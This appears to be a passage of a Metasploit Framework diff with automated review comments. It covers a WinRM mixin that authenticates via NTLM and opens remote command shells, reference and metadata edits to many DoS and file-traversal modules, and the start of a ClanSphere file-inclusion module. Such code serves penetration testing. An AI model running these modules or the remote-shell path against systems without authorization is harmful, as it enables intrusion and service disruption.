+ 'data' => opts['data']
+ }))
+ resp = c.send_recv(r, to)
+ unless resp.kind_of? Rex::Proto::Http::Response
+ return [nil,nil]
+ end
+ return [nil,nil] if resp.code == 404
+ return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
+ # Get the challenge and craft the response
+ ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
+ return [nil,nil] unless ntlm_challenge
+
+ #old and simplier method but not compatible with windows 7/2008r2
+ #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
+ #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
+ ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
+ blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
+ challenge_key = blob_data[:challenge_key]
+ server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
+ #netbios name
+ default_name = blob_data[:default_name] || ''
+ #netbios domain
+ default_domain = blob_data[:default_domain] || ''
+ #dns name
+ dns_host_name = blob_data[:dns_host_name] || ''
+ #dns domain
+ dns_domain_name = blob_data[:dns_domain_name] || ''
+ #Client time
+ chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
+ spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
+ resp_lm,
+ resp_ntlm,
+ client_challenge,
+ ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
+ domain_name, default_name, default_domain,
+ dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
+ spnopt, ntlm_options)
+ ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
+ resp_lm, resp_ntlm, '', ntlmssp_flags)
+ ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
+ # Send the response
+ r = c.request_cgi(opts.merge({
+ 'uri' => opts['uri'],
+ 'method' => 'POST',
+ 'ctype' => ctype,
+ 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
+ 'data' => opts['data']
+ }))
+ resp = c.send_recv(r, to, true)
+ unless resp.kind_of? Rex::Proto::Http::Response
+ return [nil,nil]
+ end
+ return [nil,nil] if resp.code == 404
+ return [resp,c]
+ rescue ::Errno::EPIPE, ::Timeout::Error
+ end
+ end
+
+ def accepts_ntlm_auth
+ parse_auth_methods(winrm_poke).include? "Negotiate"
+ end
+
+ def target_url
+ proto = "http"
+ if rport == 5986 or datastore['SSL']
+ proto = "https"
+ end
+ if datastore['VHOST']
+ return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}"
+ else
+ return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
+ end
+ end
+
+ private
+
+ def winrm_option_set(options)
+ xml = "<w:OptionSet>"
+ options.each do |option_pair|
+ xml << winrm_option(*option_pair)
+ end
+ xml << "</w:OptionSet>"
+ return xml
+ end
+
+ def winrm_option(name,value)
+ %Q{<w:Option Name="#{name}">#{value}</w:Option>}
+ end
+
+ def winrm_selector_set(selectors)
+ xml = "<w:SelectorSet>"
+ selectors.each do |selector_pair|
+ xml << winrm_selector(*selector_pair)
+ end
+ xml << "</w:SelectorSet>"
+ return xml
+ end
+
+ def winrm_selector(name,value)
+ %Q{<w:Selector Name="#{name}">#{value}</w:Selector>}
+ end
+
+ def winrm_wql_body(wql)
+ %Q{
+ <env:Body>
+ <n:Enumerate>
+ <w:OptimizeEnumeration xsi:nil="true"/>
+ <w:MaxElements>32000</w:MaxElements>
+ <w:Filter Dialect="http://schemas.microsoft.com/wbem/wsman/1/WQL">#{wql}</w:Filter>
+ </n:Enumerate>
+ </env:Body>
+ }
+ end
+
+ def winrm_open_shell_body
+ %q{<env:Body>
+ <rsp:Shell>
+ <rsp:InputStreams>stdin</rsp:InputStreams>
+ <rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
+ </rsp:Shell>
+ </env:Body>}
+ end
+
+ def winrm_cmd_body(cmd)
+ %Q{ <env:Body>
+ <rsp:CommandLine>
+ <rsp:Command>&quot;#{cmd}&quot;</rsp:Command>
+ </rsp:CommandLine>
+ </env:Body>}
+ end
+
+ def winrm_cmd_recv_body(cmd_id)
+ %Q{<env:Body>
+ <rsp:Receive>
+ <rsp:DesiredStream CommandId="#{cmd_id}">stdout stderr</rsp:DesiredStream>
+ </rsp:Receive>
+ </env:Body>}
+ end
+
+ def winrm_terminate_cmd_body(cmd_id)
+ %Q{ <env:Body>
+ <rsp:Signal CommandId="#{cmd_id}">
+ <rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code>
+ </rsp:Signal>
+ </env:Body>}
+ end
+
+ def winrm_empty_body
+ %q{<env:Body/>}
+ end
+
+ def winrm_envelope(data)
+ %Q{
+ <?xml version="1.0" encoding="UTF-8"?>
+ <env:Envelope xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd"
+ xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+ xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
+ xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+ xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> #{data}</env:Envelope>
+ }
+ end
+
+ def winrm_header(data)
+ %Q{
+ <env:Header>
+ <a:To>#{target_url}</a:To>
+ <a:ReplyTo>
+ <a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+ </a:ReplyTo>
+ <w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
+ <a:MessageID>uuid:#{generate_uuid}</a:MessageID>
+ <w:Locale mustUnderstand="false" xml:lang="en-US"/>
+ <p:DataLocale mustUnderstand="false" xml:lang="en-US"/>
+ <w:OperationTimeout>PT60S</w:OperationTimeout>
+ #{data}
+ </env:Header>
+ }
+ end
+
+ def winrm_uri_action(type)
+ case type
+ when "wql"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate</a:Action>}
+ when "create_shell"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>}
+ when "send_cmd"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>}
+ when "recv_cmd"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action>}
+ when "signal_shell"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action>}
+ when "delete_shell"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action>}
+ end
+ end
+
+end
+end
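Review bot: In `winrm_run_cmd` the non-200 branch `retval == resp.code || 0` compares instead of assigns, so `retval` is an undefined local and `return retval` raises NameError instead of returning the status; it should be `retval = resp.code || 0`, and because `send_request_ntlm` returns `[nil,nil]` on every failure path (and plain nil from its empty `rescue ::Errno::EPIPE, ::Timeout::Error` clause) the preceding `resp.code` needs a nil guard. The same shape recurs in `send_request_ntlm`: `ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE .../i)[1]` indexes a possibly nil MatchData, so the `return [nil,nil] unless ntlm_challenge` guard under it can never fire; capture the match first. `target_url` writes `datastore ['VHOST']` with a space, which Ruby parses as the call `datastore(['VHOST'])` rather than a hash lookup, and `parse_auth_methods` calls `include?` on `resp.headers['WWW-Authenticate']` without checking that the header is present. `winrm_cmd_body` and `winrm_wql_body` interpolate `cmd` and `wql` straight into the SOAP body, so any `<`, `>` or `&` in the operator-supplied string (WQL filters routinely contain comparison operators) produces malformed XML and a rejected request; escaping with `REXML::Text.new(cmd).to_s` before interpolation keeps the envelope well-formed. The rewritten head of `winrm_run_cmd` and the challenge extraction are below.
```ruby
def winrm_run_cmd(cmd, timeout=20)
  resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
  unless resp
    print_error "No response from the WinRM service (connection or timeout failure)"
    return nil
  end
  if resp.code == 401
    print_error "Login failure! Recheck supplied credentials."
    return resp.code
  end
  unless resp.code == 200
    print_error "Got unexpected response: \n #{resp.to_s}"
    return resp.code || 0
  end
  # … unchanged: shell create, command send, receive, terminate, delete …
end

# in send_request_ntlm, replacing the challenge extraction:
  m = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)
  return [nil,nil] unless m
  ntlm_challenge = m[1]
```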
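--- a/lib/msf/core/handler/bind_tcp.rb
+++ b/lib/msf/core/handler/bind_tcp.rb
@@ -127,7 +127,7 @@ def start_handler
 rescue Rex::ConnectionRefused
 # Connection refused is a-okay
 rescue ::Exception
-wlog("Exception caught in bind handler: #{$!}")
+wlog("Exception caught in bind handler: #{$!.class} #{$!}")
 end
 break if client
@@ -138,7 +138,6 @@ def start_handler
 # Valid client connection?
 if (client)
-
 # Increment the has connection counter
 self.pending_connections += 1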
65 lib/msf/core/module/author.rb
@@ -12,38 +12,39 @@ class Msf::Module::Author
# A hash of known author names
Known =
{
- 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
- 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
- 'skape' => 'mmiller' + 0x40.chr + 'hick.org',
- 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
- 'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
- 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
- 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
- 'MC' => 'mc' + 0x40.chr + 'metasploit.com',
- 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
- 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
- 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
- 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
- 'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com',
- 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
- 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
- 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
- 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
- 'et' => 'et' + 0x40.chr + 'metasploit.com',
- 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
- 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
- 'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
- 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
- 'natron' => 'natron' + 0x40.chr + 'metasploit.com',
- 'todb' => 'todb' + 0x40.chr + 'metasploit.com',
- 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
- 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
- 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
- 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
- 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
- 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
- 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
- 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com'
+ 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
+ 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
+ 'skape' => 'mmiller' + 0x40.chr + 'hick.org',
+ 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
+ 'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
+ 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
+ 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
+ 'MC' => 'mc' + 0x40.chr + 'metasploit.com',
+ 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
+ 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
+ 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
+ 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
+ 'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
+ 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
+ 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
+ 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
+ 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
+ 'et' => 'et' + 0x40.chr + 'metasploit.com',
+ 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
+ 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
+ 'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
+ 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
+ 'natron' => 'natron' + 0x40.chr + 'metasploit.com',
+ 'todb' => 'todb' + 0x40.chr + 'metasploit.com',
+ 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
+ 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
+ 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
+ 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
+ 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
+ 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
+ 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
+ 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
+ 'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
}
#
3  lib/rex/io/stream_abstraction.rb
@@ -149,6 +149,9 @@ def monitor_rsock
closed = true
wlog("monitor_rsock: closed remote socket due to nil read")
end
+ rescue EOFError => e
+ closed = true
+ dlog("monitor_rsock: EOF in rsock")
rescue ::Exception => e
closed = true
wlog("monitor_rsock: exception during read: #{e.class} #{e}")
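Review bot: The new `rescue EOFError => e` binds `e` but the branch never reads it, so either drop the binding (`rescue EOFError`) or feed it into the log line the way the generic branch below does, e.g. `dlog("monitor_rsock: EOF in rsock: #{e.class} #{e}")`. The clause ordering is correct: EOFError descends from StandardError, so it has to sit before the `::Exception` catch-all to be reached at all. The enclosing begin/rescue and monitor_rsock itself start outside the hunk.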
11 lib/rex/post/meterpreter/client.rb
@@ -154,7 +154,7 @@ def swap_sock_plain_to_ssl
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
# Use non-blocking OpenSSL operations on Windows
- if not ( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
+ if !( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
ssl.accept
else
begin
@@ -211,12 +211,19 @@ def generate_ssl_context
cert.version = 2
cert.serial = rand(0xFFFFFFFF)
+ # Depending on how the socket was created, getsockname will
+ # return either a struct sockaddr as a String (the default ruby
+ # Socket behavior) or an Array (the extend'd Rex::Socket::Tcp
+ # behavior). Avoid the ambiguity by always picking a random
+ # hostname. See #7350.
+ subject_cn = Rex::Text.rand_hostname
+
subject = OpenSSL::X509::Name.new([
["C","US"],
['ST', Rex::Text.rand_state()],
["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
- ["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
+ ["CN", subject_cn],
])
issuer = OpenSSL::X509::Name.new([
["C","US"],
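Review bot: Only the subject Name's CN is switched to `subject_cn`; the issuer Name that begins at the bottom of the hunk continues outside it, and if its CN still reads `self.sock.getsockname[1] || Rex::Text.rand_hostname` the String-vs-Array ambiguity the new comment describes is still present there. Reusing `subject_cn` (or drawing a second `Rex::Text.rand_hostname`) for the issuer would close that gap and keep the two Names built the same way. generate_ssl_context starts and ends outside the hunk, so I cannot confirm the issuer CN from here.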
15 lib/rex/text.rb
@@ -1,5 +1,6 @@
# -*- coding: binary -*-
require 'digest/md5'
+require 'digest/sha1'
require 'stringio'
begin
@@ -813,6 +814,20 @@ def self.md5(str)
end
#
+ # Raw SHA1 digest of the supplied string
+ #
+ def self.sha1_raw(str)
+ Digest::SHA1.digest(str)
+ end
+
+ #
+ # Hexidecimal SHA1 digest of the supplied string
+ #
+ def self.sha1(str)
+ Digest::SHA1.hexdigest(str)
+ end
+
+ #
# Convert hex-encoded characters to literals.
# Example: "AA\\x42CC" becomes "AABCC"
#
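Review bot: The doc comment on the new `sha1` helper misspells the word: `# Hexidecimal SHA1 digest of the supplied string` should read `# Hexadecimal SHA1 digest of the supplied string`. Both new helpers would also benefit from one sentence stating that SHA-1 is no longer collision-resistant, so callers should reach for them for fingerprinting and lookup keys rather than for integrity or signature checks over attacker-controlled input, e.g. `# Note: SHA1 is not collision-resistant; use for fingerprinting, not integrity.` The `require 'digest/sha1'` added in the first hunk is the right place for the dependency.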
2  modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb
@@ -35,13 +35,11 @@ def initialize
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
- 'Platform' => [ 'win' ],
'References' =>
[
[ 'OSVDB', '65533'],
[ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ]
],
- 'Privileged' => true,
'DisclosureDate' => 'Jun 15 2010'
)
2  modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
@@ -36,7 +36,7 @@ def initialize
[ 'OSVDB', '73447' ],
[ 'CVE', '2008-2938' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
- [ 'EDB', 17388 ],
+ [ 'EDB', '17388' ],
[ 'BID', '48225' ],
],
'Author' => [ 'patrick' ],
2  modules/auxiliary/admin/http/typo3_sa_2009_002.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
['OSVDB', '52048'],
['CVE', '2009-0815'],
['URL', 'http://secunia.com/advisories/33829/'],
- ['EDB', 8038],
+ ['EDB', '8038'],
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
],
'DisclosureDate' => 'Feb 10 2009',
1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
@@ -26,7 +26,6 @@ def initialize(info = {})
},
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
'License' => MSF_LICENSE,
- 'Platform' => [ 'win' ],
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
@@ -33,7 +33,6 @@ def initialize(info = {})
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
- 'Platform' => [ 'win' ],
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
5 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
@@ -51,6 +51,11 @@ def run_host(target_host)
'method' => 'GET',
}, 20)
+ if not res
+ print_error("No response from server")
+ return
+ end
+
http_fingerprint({ :response => res })
if (res.code >= 200)
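Review bot: The new guard is written as `if not res` … `end`; `not` has low precedence and the style guide discourages it, so `unless res` (keeping the `print_error` and `return` inside) is the idiomatic form for the same check. The same `if not` shape appears in the sap_mgmt_con_brute_login.rb hunk, where `return if not res` should be `return unless res`. run_host's body continues outside the hunk.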
5 modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
@@ -45,7 +45,6 @@ def initialize
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
],
# Tested OK against sol8.tor 20100624 -jjd
- 'Privileged' => true,
'DisclosureDate' => 'Jan 22 2003')
register_options(
@@ -136,8 +135,8 @@ def run
sunrpc_destroy
rescue ::Rex::Proto::SunRPC::RPCTimeout
- print_status 'Warning: ' + $!
- print_status 'Exploit may or may not have succeeded.'
+ print_warning 'Warning: ' + $!
+ print_warning 'Exploit may or may not have succeeded.'
end
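Review bot: `print_warning 'Warning: ' + $!` concatenates a String with the exception object; `String#+` needs a String (or a `to_str` implementation) and raises TypeError for an ordinary exception, so this line would itself fail inside the rescue unless `Rex::Proto::SunRPC::RPCTimeout` defines `to_str`. Interpolation sidesteps the question: `print_warning "Warning: #{$!}"`, or cleaner still `rescue ::Rex::Proto::SunRPC::RPCTimeout => e` with `print_warning "Warning: #{e}"`. The hunk only swaps print_status for print_warning and carries the concatenation over unchanged. run's body begins outside the hunk.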
2  modules/auxiliary/admin/zend/java_bridge.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
[
[ 'OSVDB', '71420'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
- [ 'EDB', 17078 ],
+ [ 'EDB', '17078' ],
],
'DisclosureDate' => 'Mar 28 2011'))
2  modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
@@ -37,7 +37,7 @@ def initialize
[
[ 'CVE', '2010-2156' ],
[ 'OSVDB', '65246'],
- [ 'EDB', 14185]
+ [ 'EDB', '14185']
]
)
register_options(
2  modules/auxiliary/dos/hp/data_protector_rds.rb
@@ -36,7 +36,7 @@ def initialize(info = {})
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
- [ 'EDB', 15940 ],
+ [ 'EDB', '15940' ],
],
'DisclosureDate' => 'Jan 8 2011' ))
2  modules/auxiliary/dos/http/apache_mod_isapi.rb
@@ -53,7 +53,7 @@ def initialize(info = {})
[ 'URL', 'https://issues.apache.org/bugzilla/show_bug.cgi?id=48509' ],
[ 'URL', 'http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
- [ 'EDB', 11650 ]
+ [ 'EDB', '11650' ]
],
'DisclosureDate' => 'Mar 05 2010'))
2  modules/auxiliary/dos/http/apache_range_dos.rb
@@ -36,7 +36,7 @@ def initialize(info = {})
[
[ 'BID', '49303'],
[ 'CVE', '2011-3192'],
- [ 'EDB', 17696],
+ [ 'EDB', '17696'],
[ 'OSVDB', '74721' ],
],
'DisclosureDate' => 'Aug 19 2011'))
2  modules/auxiliary/dos/http/sonicwall_ssl_format.rb
@@ -58,7 +58,7 @@ def run
'uri' => datastore['URI'] + fmt,
})
- if res.code == 200
+ if res and res.code == 200
res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
print_status("Information leaked: #{$1}")
end
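Review bot: The return value of `res.body.scan(...)` is discarded and `$1` is printed unconditionally, so when the pattern does not match the status line still prints `Information leaked: ` with a nil (or stale) capture; the new nil-check on `res` does not cover that case. Test the match and use it: `if (m = res.body.match(/\<td class\=\"loginError\"\>(.+)XX/ism))` then `print_status("Information leaked: #{m[1]}")`, inside the existing branch. `res && res.code == 200` also reads better than `and` in the condition. run begins outside the hunk.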
1  modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
@@ -27,7 +27,6 @@ def initialize(info = {})
Code execution may be possible however this module is only a DoS.
},
'Author' => [ 'patrick' ],
- 'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
3  modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
@@ -40,10 +40,9 @@ def initialize(info = {})
[ 'OSVDB', '70167' ],
[ 'BID', '45542' ],
[ 'MSB', 'MS11-004' ],
- [ 'EDB', 15803 ],
+ [ 'EDB', '15803' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]
],
- 'Platform' => [ 'win' ],
'DisclosureDate' => 'Dec 21 2010'))
register_options(
2  modules/auxiliary/dos/windows/ftp/solarftp_user.rb
@@ -34,7 +34,7 @@ def initialize(info={})
'Version' => '$Revision$',
'References' =>
[
- [ 'EDB', 16204 ],
+ [ 'EDB', '16204' ],
],
'DisclosureDate' => 'Feb 22 2011'))
2  modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
@@ -38,7 +38,7 @@ def initialize(info = {})
[ 'CVE', '2010-1899' ],
[ 'OSVDB', '67978'],
[ 'MSB', 'MS10-065'],
- [ 'EDB', 15167 ]
+ [ 'EDB', '15167' ]
],
'DisclosureDate' => 'Sep 14 2010'))
2  modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
@@ -30,7 +30,7 @@ def initialize(info = {})
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
- [ 'EDB', 18606 ],
+ [ 'EDB', '18606' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update' ]
],
'Author' =>
2  modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
@@ -43,7 +43,7 @@ def initialize(info = {})
[ 'BID', '46360' ],
[ 'OSVDB', '70881' ],
[ 'MSB', 'MS11-019' ],
- [ 'EDB', 16166 ],
+ [ 'EDB', '16166' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
],
'Author' => [ 'Cupidon-3005', 'jduck' ],
2  modules/auxiliary/dos/windows/tftp/solarwinds.rb
@@ -30,7 +30,7 @@ def initialize(info = {})
[
[ 'CVE', '2010-2115' ],
[ 'OSVDB', '64845' ],
- [ 'EDB', 12683 ]
+ [ 'EDB', '12683' ]
],
'DisclosureDate' => 'May 21 2010'))
2  modules/auxiliary/gather/d20pass.rb
@@ -31,7 +31,7 @@ def initialize(info = {})
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 1 $',
+ 'Version' => '$Revision$',
'DisclosureDate' => 'Jan 19 2012'
))
2  modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
- 'Version' => '$Revision: 13962 $',
+ 'Version' => '$Revision$',
'Description' => %q{
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
},
2  modules/auxiliary/scanner/h323/h323_version.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'H.323 Version Scanner',
- 'Version' => '$Revision: 9804 $',
+ 'Version' => '$Revision$',
'Description' => 'Detect H.323 Version.',
'Author' => 'hdm',
'License' => MSF_LICENSE
2  modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to read a remote file from the server using a
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
2  modules/auxiliary/scanner/http/axis_local_file_include.rb
@@ -29,7 +29,7 @@ def initialize
},
'References' =>
[
- ['EDB', 12721],
+ ['EDB', '12721'],
['OSVDB', '59001'],
],
'Author' =>
2  modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
@@ -31,7 +31,7 @@ def initialize
[
['OSVDB', '68301'],
['URL', 'http://secunia.com/advisories/41609/'],
- ['EDB', 15130]
+ ['EDB', '15130']
],
'Author' =>
[
91 modules/auxiliary/scanner/http/clansphere_traversal.rb
@@ -0,0 +1,91 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ClanSphere 2011.3 Local File Inclusion Vulnerability',
+ 'Description' => %q{
+ This module exploits a directory traversal flaw found in Clansphere 2011.3.
+ The application fails to handle the cs_lang parameter properly, which can be
+ used to read any file outside the virtual directory.
+ },
+ 'References' =>
+ [
+ ['OSVDB', '86720'],
+ ['EDB', '22181']
+ ],
+ 'Author' =>
+ [
+ 'blkhtc0rp', #Original
+ 'sinn3r'
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "Oct 23 2012"
